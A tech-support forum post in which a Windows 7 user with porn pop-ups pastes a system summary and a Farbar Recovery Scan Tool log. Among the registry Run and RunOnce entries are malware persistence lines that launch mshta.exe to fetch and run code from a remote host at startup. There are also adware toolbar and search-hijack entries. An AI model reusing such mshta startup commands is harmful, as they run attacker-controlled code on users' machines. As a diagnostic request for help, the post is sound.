# Japanese Pop-up Problem From mshta.exe



## raphael100 (May 24, 2014)

A Japanese porn pop-up keeps appearing -

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 7 Home Premium, Service Pack 1, 64 bit
Processor: Intel(R) Core(TM) i5-2467M CPU @ 1.60GHz, Intel64 Family 6 Model 42 Stepping 7
Processor Count: 4
RAM: 4041 Mb
Graphics Card: Intel(R) HD Graphics Family, 1796 Mb
Hard Drives: C: Total - 99543 MB, Free - 1161 MB; D: Total - 18161 MB, Free - 1985 MB;
Motherboard: Hewlett-Packard, 17F8
Antivirus: Norton Internet Security, Updated and Enabled

Already scanned with FRST64:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 24-05-2014 1
Ran by Hewlett Packard (administrator) on HEWLETTPACKARD on 25-05-2014 07:36:02
Running from C:\Users\Hewlett Packard\Downloads
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 11
Boot Mode: Normal
The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(HP) C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
() C:\Program Files (x86)\SMART BRO\AssistantServices.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hightail, Inc.) C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
() C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
(Samsung) C:\Program Files (x86)\Samsung\Kies\Kies.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar2.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Dropbox, Inc.) C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Windows (R) Win 7 DDK provider) C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
() C:\Program Files (x86)\SMART BRO\UIExec.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Samsung Electronics Co., Ltd.) C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\Messenger\Ymsgr_tray.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

==================== Registry (Whitelisted) ==================
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1424896 2011-10-06] (IDT, Inc.)
HKLM\...\Run: [SetDefault] => C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe [43320 2011-10-01] (Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [Hightail Sync Agent] => C:\Program Files (x86)\Hightail Desktop App\Hightail.exe [7107640 2014-02-13] (Hightail, Inc.)
HKLM\...\Run: [Internet Speed Tracker Home Page Guard 64 bit] => "C:\PROGRA~2\INTERN~3\bar\1.bin\AppIntegrator64.exe"
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-20] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1343904 2012-11-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [FLxHCIm64] => C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe [55536 2013-06-05] (Windows (R) Win 7 DDK provider)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [578944 2012-03-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UIExec] => C:\Program Files (x86)\SMART BRO\UIExec.exe [156448 2012-05-11] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [KiesTrayAgent] => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe [311152 2013-12-11] (Samsung Electronics Co., Ltd.)
HKLM-x32\...\Run: [Buffalo RUNONCE] => C:\BUFFALO\DriveNavi_HD-PUSU3-WR\%SRC_FILE1% /mode:RUNONCE1
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2014-05-13] (Hewlett-Packard)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [KiesPreload] => C:\Program Files (x86)\Samsung\Kies\Kies.exe [1564528 2013-12-11] (Samsung)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [] => C:\Program Files (x86)\Samsung\Kies\External\FirmwareUpdate\KiesPDLR.exe [845168 2013-12-11] (Samsung)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6160152 2014-05-20] (Piriform Ltd)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [20922016 2014-02-10] (Skype Technologies S.A.)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Messenger (Yahoo!)] => C:\Program Files (x86)\Yahoo!\Messenger\YahooMessenger.exe [6595928 2012-05-25] (Yahoo! Inc.)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [SystemBootTuGeEoVEpb32riqokdBynzdEKHUMor5M] => mshta.exe http://nbv.vbdsje.net/reg2.php?cccid=TuGeEoVEpb32riqokdBynzdEKHUMor5M&log=1
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [RegWriteTuGeEoVEpb32riqokdBynzdEKHUMor5M] => mshta.exe http://nbv.vbdsje.net/set_inf2.php?cccid=TuGeEoVEpb32riqokdBynzdEKHUMor5M
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\RunOnce: [RegWriteTuGeEoVEpb32riqokdBynzdEKHUMor5M] - mshta.exe http://nbv.vbdsje.net/set_inf2.php?cccid=TuGeEoVEpb32riqokdBynzdEKHUMor5M
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\MountPoints2: {29ad7905-c9b6-11e2-8bea-7ce9d3d1a3de} - E:\Autorun.exe
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\MountPoints2: {3d376ac1-37ef-11e3-b746-7ce9d3d1a3de} - F:\unlock.exe autoplay=true
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
==================== Internet (Whitelisted) ====================
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.co.uk/
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.jp.msn.com/HPALL/33
URLSearchHook: HKCU - (No Name) - {b287e6b2-868b-4ac1-acce-c69eb5fd29d1} - C:\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\9tSrcAs.dll No File
SearchScopes: HKLM-x32 - {a0892e19-6051-4ae6-9a5f-91542a166b2b} URL = http://search.tb.ask.com/search/GGm...&n=780bad74&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {a0892e19-6051-4ae6-9a5f-91542a166b2b} URL = http://search.tb.ask.com/search/GGm...&n=780bad74&psa=&st=sb&searchfor={searchTerms}
BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\x64\IEBHO.dll (HP)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\IEBHO.dll (HP)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Toolbar BHO - {9e28b297-11d4-4293-aa6f-558658ee66ae} - C:\PROGRA~2\INTERN~3\bar\1.bin\9tbar.dll No File
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Search Assistant BHO - {cc28794a-99d4-4b1b-bccf-b065ce5f9feb} - C:\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\9tSrcAs.dll No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Internet Speed Tracker - {665cb5b7-4c3b-4995-8cec-1f4d5860edc9} - C:\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\9tbar.dll No File
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - No Name - {665CB5B7-4C3B-4995-8CEC-1F4D5860EDC9} - No File
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 114.108.193.201 114.108.195.1 192.168.1.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
FF Plugin-x32: @InternetSpeedTracker_9t.com/Plugin - C:\Program Files (x86)\InternetSpeedTracker_9t\bar\1.bin\NP9tStub.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 - C:\Program Files (x86)\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 - C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: DvrClientPlugin - C:\Program Files (x86)\DVRClient Plug-in\npDVRClient.dll ()
FF Plugin HKCU: bluejeans.com/bjninstallplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjninstallplugin_2.6.118.8.dll (Blue Jeans)
FF Plugin HKCU: bluejeans.com/bjnplugin - C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjnplugin_2.6.118.8.dll (Blue Jeans)
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn\ []
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF [2013-11-25]
Chrome: 
=======
CHR HomePage: hxxp://www.mysearchresults.com/?c=3523&t=01
CHR StartupUrls: "hxxp://www.google.com/"
CHR DefaultSearchKeyword: search here
CHR DefaultSearchProvider: Search Here
CHR DefaultSearchURL: http://www.mysearchresults.com/search?c=3523&t=01&q={searchTerms}
CHR DefaultNewTabURL: 
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll ()
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\17.1.2\\npsitesafety.dll No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.450.18) - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java(TM) Platform SE 7 U45) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Live&#153; Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Shockwave for Director) - C:\Windows\system32\Adobe\Director\np32dsw.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll No File
CHR Extension: (Google Docs) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-25]
CHR Extension: (Google Drive) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-25]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-25]
CHR Extension: (YouTube) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-25]
CHR Extension: (Google Search) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-25]
CHR Extension: (Website Logon) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\debkinhcgejcbfgjiaalomcmkedjmiaa [2013-11-25]
CHR Extension: (No Name) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc [2013-12-02]
CHR Extension: (Skype Click to Call) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-02-21]
CHR Extension: (Norton Identity Protection) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-11-25]
CHR Extension: (Google Wallet) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-25]
CHR Extension: (Gmail) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-25]
CHR HKLM-x32\...\Chrome\Extension: [debkinhcgejcbfgjiaalomcmkedjmiaa] - C:\Program Files (x86)\HP SimplePass 2012\tschrome.crx [2011-08-25]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-04-11]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\Exts\Chrome.crx [2014-05-16]
==================== Services (Whitelisted) =================
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390720 2014-04-11] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1764992 2014-04-11] (Microsoft Corporation)
R2 FPLService; C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe [260424 2011-08-26] (HP)
S2 irstrtsv; C:\Windows\SysWOW64\irstrtsv.exe [184320 2011-07-07] (Intel Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-05] (Symantec Corporation)
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe [276376 2014-05-11] (Symantec Corporation)
R2 UI Assistant Service; C:\Program Files (x86)\SMART BRO\AssistantServices.exe [274760 2012-10-24] ()
S2 InternetSpeedTracker_9tService; C:\PROGRA~2\INTERN~3\bar\1.bin\9tbarsvc.exe [X]
==================== Drivers (Whitelisted) ====================
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [133672 2011-09-21] (Broadcom Corporation.)
R3 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [1530160 2014-05-10] (Symantec Corporation)
R3 BTWDPAN; C:\Windows\System32\DRIVERS\btwdpan.sys [89640 2011-09-21] (Broadcom Corporation.)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-04] (Symantec Corporation)
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys [162392 2013-09-26] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484952 2013-11-22] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [137648 2013-11-22] (Symantec Corporation)
R3 FLxHCIh; C:\Windows\System32\DRIVERS\FLxHCIh.sys [77040 2013-06-05] (Fresco Logic)
R3 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140523.001\IDSvia64.sys [525016 2014-03-26] (Symantec Corporation)
R3 irstrtdv; C:\Windows\System32\DRIVERS\irstrtdv.sys [26504 2011-06-16] (Intel Corporation)
